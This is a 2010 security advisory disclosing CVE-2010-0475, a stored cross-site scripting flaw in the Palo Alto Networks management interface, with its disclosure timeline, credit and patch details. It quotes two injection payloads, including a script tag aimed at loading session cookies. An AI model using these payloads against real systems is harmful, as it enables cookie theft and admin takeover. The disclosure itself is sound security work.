Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)

Type securityvulns
Reporter Securityvulns
Modified 2010-05-13T00:00:00


Class: Cross-Site Scripting (XSS) Vulnerability CVE: CVE-2010-0475 Remote: Yes Local: Yes Published: May 11, 2010 08:30AM Timeline:Submission to MITRE: 1/18/2010 Vendor Contact: 2/18/2010 Vendor Response: 2/18/2010 Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9) Credit: Jeromie Jackson CISSP, CISM COBIT & ITIL Certified President- San Diego Open Web Application Security Project (OWASP) Vice President- San Diego Information Audit & Control Association (ISACA) SANS Mentor LinkedIn: Blog: Twitter:

Validated Vulnerable:
Latest Version Per December 31, 2009


A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface. By crafting a URL that includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or other nefarious activity.

Exploit: Single Line working-*&cpasswd=*&role=vsysadmin<SCRIPT>alert("0wn3d")</SCRIPT>


WORKING FOR REDIRECT TO LOAD cookies into URL.*&cpasswd=*&role=vsysadmin<SCRIPT/XSS SRC=""></SCRIPT>&admin-role=%5Bobject+Object%5D&bSubmit=O

Solution: A patch will be required from the vendor. It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other such occurrences within the application.

References: OWASP Cross-Site Scripting (XSS) Attack Discussion Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet